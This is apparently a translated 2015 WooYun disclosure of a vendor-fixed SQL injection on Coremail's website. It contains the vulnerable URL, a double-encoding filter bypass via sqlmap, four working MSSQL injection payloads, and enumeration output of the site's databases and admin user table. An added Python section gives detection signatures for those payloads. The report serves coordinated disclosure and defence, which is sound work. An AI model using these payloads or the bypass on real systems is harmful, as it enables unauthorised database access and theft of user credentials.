Vulnerability summary
Defect ID: wooyun-2015-0109557
Title: SQL injection on the Coremail official website allows reading the entire database
Vendor: Coremail 盈世信息科技(北京)有限公司
Author: NGup
Submitted: 2015-04-21 23:40
Fixed: 2015-06-08 16:28
Published: 2015-06-08 16:28
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 10
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or assistance contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-04-21: Details sent to the vendor, awaiting vendor handling
2015-04-24: Vendor confirmed; details visible to the vendor only
2015-05-04: Details disclosed to core white hats and domain experts
2015-05-14: Details disclosed to regular white hats
2015-05-24: Details disclosed to intern white hats
2015-06-08: Details disclosed to the public
Brief description:
The Coremail official website has a SQL injection. A protective filter is in place, but it can be bypassed.
Details:
Vulnerable URL: http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412
Proof of vulnerability:
There is a protective filter, but running sqlmap with tamper=chardoubleencode.py gets past it directly.
These are the payloads sqlmap used:
Place: GET
Parameter: lcid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lcid=412) AND 4972=4972 AND (7728=7728
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: lcid=412) UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(116)+CHAR(65)+CHAR(115)+CHAR(111)+CHAR(66)+CHAR(77)+CHAR(112)+CHAR(118)+CHAR(77)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lcid=412) AND 6450=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8683=8683
---
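The bypass above works because the filter inspects the parameter after a single round of percent-decoding, so a double-encoded payload looks harmless. The following detection logic, an added example that is not part of the original report, decodes the `lcid` value until it stops changing and then matches it against signatures built from the four payload types listed above. The log lines and the signature set are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit
# Signatures for the four sqlmap payload types listed in the report
# (constructed for this example; not a complete SQL injection ruleset).
SIGNATURES = {
    "boolean-blind": re.compile(r"\)\s*AND\s*\d+\s*=\s*\d+", re.I),
    "mssql-error": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "union-query": re.compile(r"UNION\s+ALL\s+SELECT", re.I),
    "heavy-query": re.compile(r"FROM\s+sysusers\s+AS", re.I),
}

def full_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def raw_query_param(path, name):
    """Return the still-encoded value of `name` from a request path, or None."""
    for pair in urlsplit(path).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None

def match_signature(value):
    return next((n for n, p in SIGNATURES.items() if p.search(value)), None)

def inspect_log_line(line, param="lcid", decode_rounds=None):
    """Classify a 'date time method path status' line; decode_rounds=1
    models a filter that decodes once, None decodes fully."""
    value = raw_query_param(line.split()[3], param)
    if value is None:
        return None
    if decode_rounds is None:
        value = full_decode(value)
    else:
        for _ in range(decode_rounds):
            value = unquote(value)
    return match_signature(value)
# Constructed IIS-style log lines. The second carries the report's boolean-blind
# payload double URL-encoded, as sqlmap's chardoubleencode tamper sends it.
SAMPLE_LOG = [
    "2015-04-21 23:40:01 GET /gjzc2/list_117.aspx?lcid=412 200",
    "2015-04-21 23:40:02 GET /gjzc2/list_117.aspx?lcid=412%2529%2520AND%25204972%253D4972%2520AND%2520%25287728%253D7728 200",
    "2015-04-21 23:40:03 GET /gjzc2/list_117.aspx?lcid=412%29%20AND%206450%3D%28SELECT%20COUNT%28*%29%20FROM%20sysusers%20AS%20sys1%29 200",
]
```

Running `inspect_log_line(SAMPLE_LOG[1], decode_rounds=1)` returns None while the full-decode call returns "boolean-blind", which is exactly the gap the tamper exploits; a filter is no substitute for parameterised queries on `lcid`.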
Basic information sqlmap retrieved:
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Databases enumerated:
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ysxx201412197372
The current database is naturally ysxx201412197372.
Its tables:
back-end DBMS: Microsoft SQL Server 2005
Database: ysxx201412197372
[93 tables]
+----------------------------+
| Whir_Cmn_Area |
| Whir_Cnt_Attached |
| Whir_Cnt_CreateLog |
| Whir_Cnt_Relation |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectColumn |
| Whir_Cnt_WorkFlowLogs |
| Whir_Dev_Column |
| Whir_Dev_ConfigStrategy |
| Whir_Dev_Field |
| Whir_Dev_FormArea |
| Whir_Dev_FormArea |
| Whir_Dev_FormDate |
| Whir_Dev_FormOption |
| Whir_Dev_FormUpload |
| Whir_Dev_Menu |
| Whir_Dev_Model |
| Whir_Dev_Module |
| Whir_Dev_Plugin |
| Whir_Dev_SubmitForm |
| Whir_Ext_AuditActivity |
| Whir_Ext_Backup |
| Whir_Ext_CollectField |
| Whir_Ext_CollectField |
| Whir_Ext_Gather |
| Whir_Ext_GatherTable |
| Whir_Ext_OperateLog |
| Whir_Ext_SendEmailRecord |
| Whir_Ext_SensitiveWords |
| Whir_Ext_Tools |
| Whir_Ext_Upload |
| Whir_Ext_WorkFlow |
| Whir_Mem_MemberGroup |
| Whir_Mem_MemberGroup |
| Whir_Oa_NewsConfig |
| Whir_Oa_NewsTemp |
| Whir_Plu_AdvertPosition |
| Whir_Plu_AdvertPosition |
| Whir_Plu_SiteMap |
| Whir_Sec_Resources |
| Whir_Sec_RolesInResources |
| Whir_Sec_RolesInResources |
| Whir_Sec_Users |
| Whir_Sit_SiteInfo |
| Whir_U_Category_Bak |
| Whir_U_Category_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Category |
| Whir_U_Download_Bak |
| Whir_U_Download_Bak |
| Whir_U_Download_Category |
| Whir_U_Feedback_Bak |
| Whir_U_Feedback_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Category |
| Whir_U_Jobs_JobRequest |
| Whir_U_Links_Bak |
| Whir_U_Links_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Chapter |
| Whir_U_Magazine_Infor |
| Whir_U_Product_Bak |
| Whir_U_Product_Bak |
| Whir_U_Product_Category |
| Whir_U_SalesNet_Bak |
| Whir_U_SalesNet_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Category |
| Whir_U_SubForms_Bak |
| Whir_U_SubForms_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Category |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Bak |
| Whir_U_Survey_Detail |
| Whir_U_Survey_Question |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Bak |
| Whir_U_Vote_Detail |
+----------------------------+
Below is the table Whir_Sec_Users:
Table: Whir_Sec_Users
[19 columns]
+----------------+
| Column |
+----------------+
| CreateDate |
| CreateUser |
| Email |
| IsDel |
| LastLoginIP |
| LastLoginTime |
| LoginName |
| LoginType |
| Password |
| RealName |
| Remarks |
| RolesId |
| Sort |
| State |
| SystemLanguage |
| SystemSkin |
| UpdateDate |
| UpdateUser |
| UserId |
+----------------+
The current user is sa, so cross-database queries are possible:
Database: ReportServer
[27 tables]
+--------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| ChunkData |
| ConfigurationInfo |
| DataSource |
| Event |
| ExecutionLog |
| History |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| ServerParametersInstance |
| SnapshotData |
| Subscriptions |
| UpgradeInfo |
| Users |
| Catalog |
| Keys |
+--------------------------+
The whole database could be dumped.... -_-
I didn't dump it,
didn't dump it,
dump....
Fix recommendation:
Filtering.
Copyright notice: when reposting, please credit the source NGup@乌云
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 7
Confirmed: 2015-04-24 16:27
Vendor reply:
Acknowledged; the fix has been completed.
Latest status:
None yet.